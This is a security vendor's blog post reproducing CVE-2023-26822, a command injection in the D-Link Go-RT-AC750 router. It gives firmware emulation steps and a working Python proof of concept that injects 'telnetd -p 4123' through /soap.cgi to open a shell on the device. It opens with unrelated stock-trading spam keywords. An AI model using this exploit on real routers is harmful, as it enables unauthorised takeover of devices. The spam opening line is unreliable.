a股开户开哪家比较好,股票做空是怎么做,配资炒股投资

买股票怎么加杠杆佰朔资本介绍-k线图形态24种经典图解-【东方资本】,股票配资交易app,配资炒股比例国家规定是多少,配资在线平台排行榜

熱門閱讀

四年同行，韌性共鑄：西南某商行攜手美創科技再度通過年度容災大考

2025-12-26

以“AI+數據安全”領雁！祝賀美創牽頭項目入選浙江省科技廳“尖兵領雁”計劃！

2025-12-22

美創AI災備專家：引領災備領域邁入“智能化”時代

2025-12-15

熱點觀察｜美創科技丁斐：數據安全 × 價值共創？可信數據空間的 “雙向奔赴”

2025-12-03

美創科技高校供應鏈數據安全方案斬獲 2025 年度 “金智獎”

2025-12-03

Strix自動滲透測試平臺搭建與使用

2025-12-22

每周安全速遞3?? | 勒索軟件攻擊導致心理健康機構超11萬人數據泄露

2025-12-19

每周安全速遞3?? | 安卓勒索軟件DroidLock針對西班牙語言用戶進行攻擊

2025-12-15

每周安全速遞3?? | 美國電信與汽車服務巨頭遭Cl0p勒索攻擊

2025-12-05

每周安全速遞3?? | ShinyHunters 開發新型勒索軟件ShinySp1d3r

2025-11-21

D-Link Go-RT-AC750 命令注入漏洞（CVE-2023-26822）復現

發布時間：2023-05-26 閱讀次數： 1031 次

漏洞概述

D-Link Go-RT-AC750是一款雙頻無線路由器。

D-Link Go-RT-AC750在固件版本為revA_v101b03中存在命令注入漏洞，漏洞編號：CVE-2023-26822。未經授權的攻擊者可以請求 /soap.cgi 路由通過攜帶的參數進行命令拼接，從而控制路由器。

環境搭建

1.FirmAE 工具安裝；首先拉取FirmAE 工具倉庫

git clone --recursive https://github.com/pr0v3rbs/FirmAE

運行下載腳本；

cd FirmAE/./download.sh

運行./install.sh進行安裝

2.下載固件

本文模擬的是設備型號為Go-RT-AC750，固件版本：revA_v101b03

下載地址:

https://eu.dlink.com/uk/en/products/go-rt-ac750-wireless-ac750-dual-band-easy-

下載后得到GORTAC750_A1_FW_v101b03.bin固件文件

3.FirmAE工具初始化

在FirmAE工具目錄下執行./init.sh進行初始化

4.安裝binwalk

這里使用FirmAE工具目錄下的binwalk安裝程序進行安裝

cd binwalk-2.3.3/

python3 setup.py install

5.模擬運行固件
執行如下命令對固件進行解壓

binwalk -Me /root/GORTAC750_A1_FW_v101b03.bin --run-as=root

執行如下命令來模擬運行固件

sudo ./run.sh -r GORTAC750 /root/GORTAC750_A1_FW_v101b03.bin

使用瀏覽器訪問http://192.168.0.1，出現如下界面則表明成功模擬了一臺D-Link Go-RT-AC750路由器

漏洞復現

POC內容如下：

ｆｒｏｍ socket import *ｆｒｏｍ os import *ｆｒｏｍ time import *
request = b"POST /soap.cgi?service=&&telnetd -p 4123& HTTP/1.1\r\n"request += b"Host: localhost:49152\r\n"request += b"Content-Type: text/xml\r\n"request += b"Content-Length: 88\r\n"request += b"SOAPAction: a#b\r\n\r\n" s = socket(AF_INET, SOCK_STREAM)s.connect((gethostbyname("192.168.0.1"), 49152))s.send(request) sleep(10)system('telnet 192.168.0.1 4123')